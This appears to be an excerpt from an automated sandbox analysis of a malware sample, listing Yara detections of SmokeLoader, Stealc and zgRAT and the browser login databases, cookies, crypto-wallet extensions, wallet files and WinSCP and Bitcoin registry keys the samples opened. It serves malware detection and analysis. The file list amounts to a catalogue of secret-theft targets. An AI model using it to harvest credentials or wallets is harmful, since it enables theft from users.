Source: Yara match	File source: 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1919407201.0000000004D3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6840, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\A203.exe, type: DROPPED

Yara detected SmokeLoader

Source: Yara match	File source: W73PCbSH71.exe, type: SAMPLE
Source: Yara match	File source: 3.0.jfhrjta.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.toolspub2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.toolspub2.exe.5515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jfhrjta.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.W73PCbSH71.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.W73PCbSH71.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1687909281.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1925341423.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1925621429.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2100813510.00000000004A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1688011276.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2100651927.0000000000470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\jfhrjta, type: DROPPED

Yara detected Stealc

Source: Yara match	File source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001E.00000003.2191639090.0000000000950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected zgRAT

Source: Yara match	File source: 36.2.7D14.exe.330000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.907.exe.c30000.0.unpack, type: UNPACKEDPE

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: *electrum.Servers
Source: dialer.exe, 00000022.00000003.2713011554.000001B8F6091000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %AppData%\ElectronCash\config
Source: RegAsm.exe, 00000015.00000002.2357230523.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Chrome/Default/Extensions/Jaxx Liberty
Source: RegAsm.exe, 00000015.00000002.2357230523.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: dialer.exe, 00000022.00000003.2654638075.000001B8F6080000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: passphrase.json
Source: dialer.exe, 00000022.00000003.2704944546.000001B8F60FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: !%LOCALAPPDATA%\Ethereum\keystore\
Source: RegAsm.exe, 00000015.00000002.2357230523.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Edge/Default/Extensions/ExodusWeb3-
Source: RegAsm.exe, 00000015.00000002.2357230523.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: 907.exe, 00000006.00000000.1906824742.0000000000DD1000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\System32\dialer.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-Qt
Source: C:\Windows\System32\dialer.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\System32\dialer.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\\logins.json
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\9234.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\\cert9.db
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\9234.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENT
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\\formhistory.sqlite
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Users\user\AppData\Local\Temp\A203.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.db
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
Source: C:\Users\user\AppData\Local\Temp\A203.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
